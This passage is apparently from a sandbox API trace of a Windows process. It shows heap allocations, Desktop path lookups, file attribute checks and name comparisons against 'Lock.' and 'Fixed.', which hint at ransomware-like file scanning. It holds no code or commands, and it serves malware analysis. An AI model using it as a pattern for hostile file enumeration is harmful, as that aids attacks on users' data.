lpFilePart=0x8bf658*="YItI7wiYOV-Y.xlsx") returned 0x37 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0190.337] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YItI7wiYOV-Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yiti7wiyov-y.xlsx")) returned 0xffffffff [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.338] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0190.338] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.338] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0190.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yvFiHqzM6fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vFiHqzM6fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FiHqzM6fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iHqzM6fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HqzM6fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qzM6fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zM6fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fmTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mTt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tt.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0190.339] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0190.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0190.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yvFiHqzM6fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vFiHqzM6fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FiHqzM6fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iHqzM6fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HqzM6fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qzM6fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zM6fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fmTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mTt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tt.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36f8 [0190.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0190.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0190.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0190.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.342] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.342] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0190.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0190.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.343] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.343] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.345] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.345] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0190.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0190.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0190.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 